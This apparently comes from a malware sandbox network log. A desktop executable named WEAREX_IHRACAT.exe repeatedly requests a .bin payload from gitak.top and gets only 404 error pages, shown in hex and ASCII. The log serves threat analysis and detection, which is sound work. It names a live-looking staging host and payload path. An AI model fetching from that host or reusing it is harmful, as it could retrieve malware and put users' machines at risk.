                        2024-08-29 10:40:28 UTC1369INData Raw: 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:40:28 UTC910INData Raw: 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37
                        Data Ascii: 2.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627
                        2024-08-29 10:40:28 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.11.2049778172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:40:39 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:39 UTC681INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:39 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 21
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWXXS2NrwTGdUxdtZPpsZTpq8PP%2Bh4tk92eB%2FEd5X13HxWMvQ%2B6NdI2shR5ctT2z8oU1E4HTXmPeGexsCOi5j4W%2FHdkE0kdFxfXspk4Tk%2Bm1yHedovEr5Pti9IA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babec950eb559f1-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:40:39 UTC688INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:40:39 UTC1369INData Raw: 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:40:39 UTC916INData Raw: 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:40:39 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.11.2049779172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:40:49 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:49 UTC675INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:49 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 31
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0fWlft6fUQ4S4m4KlgLPN5GN2AGQUD7AL7zviH7Ky3zISp6ZpHnfTQrQtdHPn3GPqoPei3sBc5gN1WUIihvF5Y%2BpAf7A4Bpcdnl1W%2BRSByVg3wQsjOuM3azODM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babecd6edd32d15-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:40:49 UTC694INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:40:49 UTC1369INData Raw: 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:40:49 UTC910INData Raw: 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37
                        Data Ascii: 2.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627
                        2024-08-29 10:40:49 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.11.2049780172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:41:00 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:00 UTC673INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:00 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 42
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGiHI3lLvT9Gur%2FzlVH2DRekG2i01nj0wF8JaD0PDHAb3Vx3HLZBTbOoe87ew2QVaaNRadhADqYBGLdObIr7C8zJRuT68CpYshrP3ekInFYY3JTra00i0dP02DA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babed18a9bb082e-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:41:00 UTC696INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:41:00 UTC1369INData Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a 0a
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:41:00 UTC908INData Raw: 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30
                        Data Ascii: 415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0
                        2024-08-29 10:41:00 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.11.2049781172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:41:10 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:10 UTC673INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 52
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7gL3sdbOuJzSEcJkT99MXrxL780mMWdYRsl3RrCszGJhf9VuZqfcXQG0z6504sWRm1nsGiSL4fIXJA2sCPjAZe5kDXg2AB3Xa9%2BYi2a0kOCrOsKiLgG0cxQFTo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babed5a69411fd4-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:41:10 UTC696INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:41:10 UTC1369INData Raw: 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a 0a
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:41:10 UTC908INData Raw: 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30
                        Data Ascii: 415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0
                        2024-08-29 10:41:10 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.11.2049782172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:41:21 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:21 UTC685INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:21 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 63
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5b2RW%2Fj%2BT4RrEZWx4D%2FnyakwG90IGNXz%2Fl%2Fy9eJcEXVaz99bZLUGlNYOClAFPHSWDkTInHh3OqeupG1uIY%2FCy1DDISV8N41MvZpYqErhYiSpEZDk9JPknQQYf8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babed9c1cd9c584-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:41:21 UTC684INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
